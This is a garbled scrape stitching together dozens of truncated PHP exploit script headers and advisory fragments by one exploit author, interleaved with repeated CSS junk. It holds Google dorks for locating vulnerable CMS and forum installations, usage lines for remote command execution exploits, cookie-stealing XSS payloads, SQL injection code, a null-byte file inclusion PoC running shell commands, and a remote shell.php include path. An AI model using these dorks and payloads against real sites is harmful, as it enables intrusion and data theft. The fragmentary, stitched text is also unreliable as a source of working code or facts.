#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org
dork: "Driven by DokuWiki"
');
/*
works with register_argc_argv = On
*/
if ($argc<4) {
print_r('
-
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org
');
/*
works with
register globals = *Off*
magic_quotes_gpc = Off
explanation:
vulnerable code in maincore.php at lines 15-21:
...
if
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org
dork: "This site is powered by e107"|inurl:e107_plugins|e107_handlers|e107_files
');
/*
works with register_globals=On
against PHP < 4.4.1, 5
php/zend_hash_del_key_or_index_vulnerability.html
The SMF team released versions 1.0.8 and 1.1.rc3 to patch these issues
----
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici.org
ecart]/admin/login.php?email=";>alert(document.cookie)
----
rgod 17/08/20067.15.36
site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/cubecart_3011_adv.html
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Powered by XMB\"\n\n";
/*
works regardless of php.ini settings
*/
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path username password cmd OPTIONS\n";
echo "host: target server (ip/hostname)\
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Powered by sendcard - an advanced PHP e-card program\"\n\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path action [location] [cmd] OPTIONS\n";
echo "host: target server (ip/hostname)\n";
ec
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork, version specific: \"Web site engine's code is copyright\"
\"2001-2006 ATutor\" \"About ATutor\"\n\n";
/*
- works regardless of php.ini settings
- with Mysql >= 4.1 (allowing SELECT subqueries for ORDER BY
.$thisIp."'".' or banip='."'".$thisIpMask[0]."'".' or //<--- sql
injection
banip='."'".$thisIpMask[1]."'".' or banip='."'".$user_id."'");
echo mysql_error();
if($res and mysql_num_rows($res)>0) return TRUE; else return FALSE;
}
1.05 29/07/2006
rgod
http://retrogod.altervista.org/php_ip2long.htm
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "google dork: \"Content managed by the Etomite Content Management
System\"\r\n\r\n";
/*
works regardless of php.ini settings
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "a dork: \"Powered by LoudBlog\"\r\n\r\n";
/*
works regardless of magic_quotes_gpc settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host: target server (ip/hostname)
I just modified the Geeklog exploit so that it works against Toenda; PoC:
http://retrogod.altervista.org/toenda_100_shizouka_xpl.html
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
/*
works regardless of php.ini settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server
r than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"This forum powered by Phorum.\"\n\n";
/*
works with:
register_globals=On
magic_quotes_gpc=Off
*/
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\n";
echo "host: targe
rgod
site: http://rgod.altervista.org
mail: rgod @ autistici.org
original url: http://retrogod.altervista.org/flatnuke257_adv.html
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" |
\"powered by cms papoo\"\n\n";
/*
notes:
works regardless of magic_quotes_gpc settings...
there is some magic quotes disable code in variabl
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dorks: \"Powered byPivot\"\n";
echo "version specific: \"Powered byPivot - 1.30 RC2\" +Rippersnapper\n\n";
/*
works with register_globals=On
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTION
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\n";;
echo "dork: \"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004,
Radek Hulán\"\n\n";
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by jaws\" | \"powered by the jaws project\" |
inurl:?gadget=search\r\n\r\n";
/*
works regardless of php.ini settings
if 'Search gadget' is enabled
*/
if ($argc<3) {
echo "Usage: php ".$argv[
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "this is called the Sun-Tzu 'trascendental guru meditation'
tecnique\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by bitweaver\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to bitweaver\r\n";
ec
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by blur6ex\"\r\n\r\n";
/*
works regardless of php.ini settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\"
\"Valid XHTML 1.0 Strict and CSS\"\r\n\r\n";
/*
works regardless of magic_quotes_gpc settings
*/
if ($argc<3) {
echo "Usage: php ".$argv[0].
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: \"propulsé par DotClear\" \"fil atom\" \"fil rss\"
+commentaires\r\n\r\n";
/*
works with PHP5
register_globals=On,
allow_url_fopen=On
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path ft
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid
CSS\"\r\n\r\n";
/*
works with:
magic_quotes_gpc=Off
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path your_ip cmd OPTIONS\r\n";
echo
in all mentioned files we have:
...
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
...
so I would like to see how the reported include vulnerability could work here: $phpbb_root_path is hard-coded to "./../" before the require(), not taken from user input...
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: intext:\"Powered by pppblog\"\r\n\r\n";
/*
works with:
register_globals=On
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path path_to_file OPTIONS\r\n";
echo "host: target server (i
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org |\r\n";
echo "| dork: inurl:wp-login.php Register Username Password -echo|\r\n";
echo "\r\n";
/*
this works:
regardles
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
/*
this works with a user account that has upload rights and permission to modify
stories; however, this is only a PoC, and you can do the same by uploading an attachment
through any module, like this, with double exte
ger/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
---
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
---
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";
echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS
. Back to top\r\n\r\n";
/*
works with:
register_globals=On
allow_url_fope
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
/*
works with:
magic_quotes_gpc = Off
register_globals = On
*/
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path:
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "tested & working against a fresh deluxebb installation\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: pat
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to PHP-Fusion\r\n";
echo "user/pass: you need an account\r\
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path:
an admin, or anyone who manages to obtain the admin's session id (sid), is able to launch commands;
advisory/poc exploit:
http://retrogod.altervista.org/phpbb_2020_admin_xpl.html
TTP/1.0
HOST: some_vulnerable.host
Connection: close
obviously you get no output back, but this makes phpBB behave like a blind HTTP proxy (a server-side request forgery primitive: the request is issued from the phpBB host)
(3) inject some php code inside jpeg files as EXIF metadata content:
this, in combinations with third party vulnerable code c
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
ech
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to PHPFusion\r\n";
echo "cmd: a shell command\r\n
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "-> works regardless of magic_quotes_gpc settings\r\n";
echo " if avatar uploads are enabled (default)\r\n";
echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n";
if ($argc<4) {
echo
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org *\r\n";
echo "* a special tnX goes to Frozen for his dork! *\r\n";
echo "* and a thanks to all people of johnny.ihackstuff.com!!*\r\n";
echo "* site: http://retrogod.altervista.org
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> works with magic_quotes_gpc = Off\r\n";
echo "dork: \"powered by PCPIN.com\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n
o insert html/
/javascript code or simply deface the main page
temporary patch -> replace this line:
...
if ($updwelcome && isset($welcomedata) && check_welcome($dir)) {
...
with:
...
if ($admin && $updwelcome && isset($welcomedata) && check_welcome($dir
print nl2br(htmlentities(implode($readme, ' ')));
print "Continue\n";
print "\n";
exit;
}
}
...
google search:
inurl:"extras/update.php" intext:mysql.p
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: intext:\"Powered by simplog\"\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to simplog
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> this works against register_globals=On \r\n";
echo "a dork: inurl:\"lists/?p=subscribe\" |
inurl:\"lists/index.php?p=subscribe\"\r\n";
echo " -ubbi phplist\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "dork: Welcome to your PHPOpenChat-Installation!\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to PhpO
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "-> works with magic_quotes_gpc=Off\r\n\r\n";
echo "dork: intext:\"2000-2001 The phpHeaven Team\" -sourceforge\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: t
http://reloadcms.com/
description: "ReloadCMS is a free CMS written on PHP and based on flat files."
vulnerability:
ReloadCMS does not properly sanitize the User-Agent request header before storing it
in the stats.dat file, so an attacker controls the bytes written to that file.
Example of attack, through netcat:
rgod>nc target.ho
ost: [host]
Connection: Close
iii) information disclosure: you can go to:
http://[target]/[path]/checktables.php
to see the database table prefix on screen, which makes the exploitation
process easier...
---
his can be exploited to
include files having the template file extension (".html") from local resources
via directory traversal attacks"
and classified it as low risk... this is true on PHP 5 but not on PHP 4, where you
can cut off the appended .html extension with a null byte (%00) in the path (note: PHP only started rejecting null bytes in filesystem paths in 5.3.4, so early PHP 5 builds may be affected as well)
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/4images_171_adv.html
ize: 0.8em
!important} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !i
arget]/[path]/docs/showdoc.php?f=c:\boot.ini
http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php
(the last one from a samba resource...)
if magic_quotes_gpc=on, "c:\\boot.ini" after stripslashes becomes "c:\boot.ini"
(because stripslashes only removes one level of escaping, doubling the backslashes bypasses the quoting)
and "\
font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size:
rtant} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:li
t} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-
SER | ERROR | 20060211 035519 | 192.168.1.5 | User : login failed!
now, if magic_quotes_gpc = Off on the target system, you can launch operating system
commands (the null byte in lang= truncates the appended extension); PoC:
http://[target]/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00
(same technique with install dir scripts...)
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
original adivsory: http://retrogod.altervista.org/linpha_10_local.html
FCKEditor 2.0 <= 2.2)
--
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
--
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Ve
text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;